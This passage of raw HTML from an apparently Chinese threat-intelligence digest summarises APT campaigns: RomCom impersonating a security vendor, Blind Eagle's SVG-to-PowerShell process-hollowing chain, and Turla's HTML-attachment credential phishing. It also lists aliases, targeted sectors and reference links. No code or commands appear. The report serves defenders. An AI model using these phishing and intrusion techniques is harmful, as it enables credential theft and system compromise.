&#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">能源，制造业，工业</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="color: rgb(0, 82, 255);font-weight: bold;font-size: 14px;text-align: left;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf=""><a href="https://securityonline.info/shadow-void-042-impersonates-trend-micro-in-phishing-campaign-to-breach-critical-infrastructure/" target="_blank">https://securityonline.info/shadow-void-042-impersonates-trend-micro-in-phishing-campaign-to-breach-critical-infrastructure/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;"><span leaf="" mpa-font-style="mdig1jnt1o4d" style="font-size: 14px;" data-mpa-action-id="mdig1jo4rhy" data-pm-slice="0 0 []">一场针对关键基础设施相关领域的攻击行动，此次行动是更大规模攻击的延续，与前期采用不同情感诱导手段的攻击存在关联。攻击者RomCom借助知名安全厂商品牌形象实施钓鱼攻击，先伪造以安全公告为题的紧急邮件，谎称系统存在漏洞，引诱用户点击链接，进而重定向至仿冒官网风格的钓鱼网站。攻击中结合新旧手段，会根据目标设备定制中间载荷，部署恶意代码并利用已知浏览器漏洞，且针对不同目标采用多样化钓鱼和漏洞利用手法。此次攻击可能导致目标机构系统被未授权入侵，威胁关键基础设施安全运行，还可能引发数据泄露、系统不稳定等问题，造成严重安全风险。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9nwx18pm"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8mag1iszk" style="font-size: 32px;" data-mpa-action-id="md8mag1o11kh" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">APT-C-36 利用内部邮箱信任绕过安全管控，实现对目标系统远程控制</span></span></p></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">G0099, APT-Q-98, 盲眼鹰, BlindEagle</span></span></p></li><li style="font-size:14px;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙主要影响行业：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">能源, 政法, 金融</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j9nw51iia" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://gbhackers.com/blind-eagle-hackers/" target="_blank">https://gbhackers.com/blind-eagle-hackers/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;margin-bottom: 16px;"><span leaf="" mpa-font-style="mdig8jem1ew" style="font-size: 14px;" data-mpa-action-id="mdig8jez46l" data-pm-slice="0 0 []">APT-C-36通过窃取的内部邮箱账户，借助组织内部信任关系及完善邮件元数据伪装，实施鱼饵钓鱼攻击。攻击以合法邮件传输机制绕过传统安全检测，向目标邮箱发送法律主题的伪造邮件，附带 SVG 格式图像附件。受害者点击附件后，会解码出伪装成官方司法门户的 HTML 页面，诱导下载 JavaScript 文件。该文件在内存中经多阶段反混淆脚本执行，通过 WMI 调用 PowerShell 命令加载.NET 程序集，进而获取远程加密配置数据及相关文件并执行，最终以进程空洞技术劫持合法进程，植入支持键盘记录、磁盘访问的远控木马。整个攻击链条采用多重混淆与内存执行技术，避免恶意代码触及磁盘，防御系统难以察觉。此次攻击成功绕过邮件安全检测，可能导致敏感信息泄露及系统远程控制，严重威胁受害机构的业务连续性与信息安全。</span></p><p style="text-align: center;" nodeleaf=""><img data-imgfileid="100027345" class="rich_pages wxw-img" data-ratio="0.8231481481481482" data-s="300,640" data-type="png" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6a93da32&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWVOLN3ibuhuNxneajvOriaicN1xazG1CJNYFYecmCekPiaVoc0ZibicI3T34Zery3ibXrs0ibiaoiaN6l4ibC9Ow%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9nwx18pm"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8mag1iszk" style="font-size: 32px;" data-mpa-action-id="md8mag1o11kh" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">05</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Turla伪装官方命令实施高压钓鱼攻击，以恶意 HTML 附件窃取多组织敏感信息</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;font-weight:bold;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-weight: normal;letter-spacing: 0.034em;"><span leaf="">KRYPTON, SUMMIT, WRAITH, SIG23, Pfinet, UNC4210, Secret Blizzard, UAC-0024, TAG_0530, MAKERSMARK, Waterbug, Snake, Pacifier APT, Hippo Team, Skipper Turla, UAC-0003, Uroburos, Popeye, APT-Q-78, ITG12, UAC-0144, Venomous Bear, IRON HUNTER, WhiteBear, Blue Python, Group 88, G0010, ATK13, Turla Team</span></span></p></li><li style="font-size:14px;font-weight:bold;"><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-weight: normal;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙主要影响行业：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-weight: normal;letter-spacing: 0.034em;"><span leaf="">政法, 金融, 能源, 互联网技术服务</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j9nw51iia" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://securityonline.info/blurred-deception-russian-apt-targets-transnistria-and-nato-with-high-pressure-phishing-lures/" target="_blank">https://securityonline.info/blurred-deception-russian-apt-targets-transnistria-and-nato-with-high-pressure-phishing-lures/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="mdig8jem1ew" style="font-size: 14px;" data-mpa-action-id="mdig8jez46l" data-pm-slice="0 0 []">该攻击事件针对多个公共机构实施精确的凭证窃取行动，疑似为一项持续性入侵行动的一部分。攻击者通过伪造邮件，冒充上级单位下达紧急命令，邮件附件为恶意HTML文件，诱使受害者点击后进入伪造的登录页面。该页面通过CSS模糊效果迫使用户输入邮箱和密码，输入的数据随后被盗取。此外，攻击者还利用恶意域名加载额外脚本，进一步扩展攻击范围。此次攻击不仅涉及多个公共管理机构，还波及多个区域性的活动组织和国际交流机构，旨在获取高价值凭证。此次行动可能导致多个受害组织的凭证泄露，威胁系统安全和关键信息基础设施，对整体运作和区域稳定构成严重风险。</span></p></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px #222CFF;" data-mid=""><span leaf="">02</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8in6w7nn3" style="font-size: 20px;" data-mpa-action-id="md8in6x11o66" data-pm-slice="0 0 []">热点攻击手段</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j8nv91q33"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 10 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 